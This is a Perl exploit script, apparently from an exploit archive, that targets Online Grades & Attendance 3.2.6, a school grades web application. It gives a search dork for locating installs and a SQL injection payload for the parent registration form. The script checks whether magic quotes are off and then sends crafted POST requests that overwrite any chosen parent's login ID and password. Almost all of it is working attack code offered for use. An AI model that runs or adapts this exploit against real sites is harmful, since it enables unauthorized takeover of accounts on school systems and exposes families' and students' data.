================================================================ Online Grades & Attendance 3.2.6 Credentials Changer SQL Exploit ================================================================ #!/usr/bin/perl #*********************************************************************************************** # #---------------------------------------------------------------------------------------------- #| (Post Form --> Parent Register (name)) Credentials Changer (SQLi) EXPLOIT | #|--------------------------------------------------------------------------------------------| #| | Online Grades & Attendance v-3.2.6 | | #| CMS INFORMATION: ----------------------------------------- | #| | #|-->WEB: http://www.onlinegrades.org/ | #|-->DOWNLOAD: http://www.onlinegrades.org/ | #|-->DEMO: http://www.onlinegrades.org/demo_info | #|-->CATEGORY: CMS / Education | #|-->DESCRIPTION: Online Grades is based on the project, Basmati. It has all of the same | #| features plus many new features. OG is a web based grade... | #|-->RELEASED: 2009-02-05 | #| | #| CMS VULNERABILITY: | #| | #|-->TESTED ON: firefox 3 | #|-->DORK: "Powered by Online Grades" | #|-->CATEGORY: SQL INJECTION | #|-->AFFECT VERSION: <= 3.2.6 | #|-->Discovered Bug date: 2009-05-21 | #|-->Reported Bug date: 2009-05-21 | #|-->Fixed bug date: Not fixed | #|-->Info patch: Not fixed | #|-->Author: YEnH4ckEr | #|-->WEB/BLOG: N/A | #|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. | #|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) | #---------------------------------------------------------------------------------------------- # #------------ #CONDITIONS: #------------ # #gpc_magic_quotes=OFF # #----------------- #PRE-REQUIREMENTS #----------------- # #Option --> Self Registration --> Allowed (Default value) # #------- #NEED: #------- # #Valid parent id # #--------------------------------------- #PROOF OF CONCEPT (SQL INJECTION): #--------------------------------------- # #Register module (name) is vuln to sql injection. # #Full name --> y3nh4ck3r', id=1 ON DUPLICATE KEY UPDATE client_id='owned'# # #Other parameters --> something # # #Return: Change client_id to 'owned' for parent id=1 # # # use LWP::UserAgent; use HTTP::Request; #Subroutines sub lw { my $SO = $^O; my $linux = ""; if (index(lc($SO),"win")!=-1){ $linux="0"; }else{ $linux="1"; } if($linux){ system("clear"); } else{ system("cls"); system ("title Online Grades Attendance v-3.2.6 (Credentials changer) Exploit"); system ("color 02"); } } sub request { my $userag = LWP::UserAgent->new; $userag -> agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); if($_[2] eq "post"){ $request = HTTP::Request -> new(POST => $_[0]); $request->referer($_[0]); $request->content_type('application/x-www-form-urlencoded'); $request->content($_[1]); }else{ $request = HTTP::Request -> new(GET => $_[0]); } my $outcode= $userag->request($request)->as_string; return $outcode; } sub error { print "\t------------------------------------------------------------\n"; print "\tWeb isn't vulnerable!\n\n"; print "\t--->Maybe:\n\n"; print "\t\t1.-Patched.\n"; print "\t\t2.-Bad path or host.\n"; print "\t\tEXPLOIT FAILED!\n"; print "\t------------------------------------------------------------\n"; } sub errormagicquotes { print "\t------------------------------------------------------------\n"; print "\tWeb isn't vulnerable!\n\n"; print "\t\tRaison--> Magic quotes ON.\n"; print "\t\tEXPLOIT FAILED!\n"; print "\t------------------------------------------------------------\n"; } sub helper { print "\n\t[!!!] Online Grades & Attendance <= v-3.2.6 (Credentials changer) Exploit\n"; print "\t[!!!] USAGE MODE: [!!!]\n"; print "\t[!!!] perl $0 [HOST] [PATH] [Email Address] [Password] [Target_id]\n"; print "\t[!!!] [HOST]: Web.\n"; print "\t[!!!] [PATH]: Home Path.\n"; print "\t[!!!] [Email Address]: Set value\n"; print "\t[!!!] [Password]: Set value\n"; print "\t[!!!] [Target_id]: victim id\n"; print "\t[!!!] Example: perl $0 'www.onlinegrades.org' 'demo' 'y3nh4ck3r' 'y3nh4ck3r' '1' \n"; } #Main &lw; print "\t#######################################################\n\n"; print "\t#######################################################\n\n"; print "\t## Online Grades & Attendance <= v-3.2.6 ##\n\n"; print "\t## (Credentials changer) Exploit ##\n\n"; print "\t## ++Conditions: magic_quotes=OFF ##\n\n"; print "\t## ++Needed: Valid parent id ##\n\n"; print "\t## Author: Y3nh4ck3r ##\n\n"; print "\t## Proud to be Spanish! ##\n\n"; print "\t#######################################################\n\n"; print "\t#######################################################\n\n"; #Init variables my $host=$ARGV[0]; my $path=$ARGV[1]; my $client_id=$ARGV[2]; my $client_pw=$ARGV[3]; $numArgs = $#ARGV + 1; if($numArgs<=3) { &helper; exit(1); } if(!$ARGV[4]){ $target_id=1; }else{ $target_id=$ARGV[4]; } #Build uri my $finalhost="http://".$host."/".$path."/parents/register.php?action=register"; my $phpinfo="http://".$host."/".$path."/include/phpinfo.php"; #sql injection $injection="y3nh4ck3r', id=".$target_id." ON DUPLICATE KEY UPDATE client_id='".$values."'#"; $post="name=".$injection."&email=y3nh4ck3r%40gmail.com&pass1=y3nh4ck3r&pass2=y3nh4ck3r"; $output=&request($phpinfo,0,'get'); if($output=~(/\\magic\_quotes\_gpc\<\/td\>\On\<\/td\>\On\<\/td\>\<\/tr\>/)){ &errormagicquotes; exit(1); } $injection_email="y3nh4ck3r', id=".$target_id." ON DUPLICATE KEY UPDATE client_id='".$client_id."'#"; $post="name=".$injection_email."&email=y3nh4ck3r%40gmail.com&pass1=y3nh4ck3r&pass2=y3nh4ck3r"; $output=&request($finalhost, $post, 'post'); $injection_pw="y3nh4ck3r', id=".$target_id." ON DUPLICATE KEY UPDATE client_pw='".$client_pw."'#"; $post="name=".$injection_pw."&email=y3nh4ck3r%40gmail.com&pass1=y3nh4ck3r&pass2=y3nh4ck3r"; $output=&request($finalhost, $post, 'post'); #processed if($output!~(/\ERROR\<\/strong\>/)) { print "\n\t-----------------------------------------------------------------\n"; print "\t-- EXPLOIT EXECUTED (Online Grades & Attendance <= v-3.2.6) --\n"; print "\t-- (Credentials changer) Exploit --\n"; print "\t-----------------------------------------------------------------\n\n"; print "\t\tParent credentials changed!\n\n"; print "\t\tIf id doesn't exist, you add a new inconsistent user!\n\n"; print "\n\t<<<<<<----------------------FINISH!---------------->>>>>>>>\n\n"; print "\t<<<<<<--------------Thanks to: y3hn4ck3r------------>>>>>>>\n\n"; print "\t<<<<<<-----------------------EOF-------------------->>>>>>>\n\n"; }else{ &error; } exit(1); #Ok...all job done # 0day.today [2018-01-11] #

Query Builder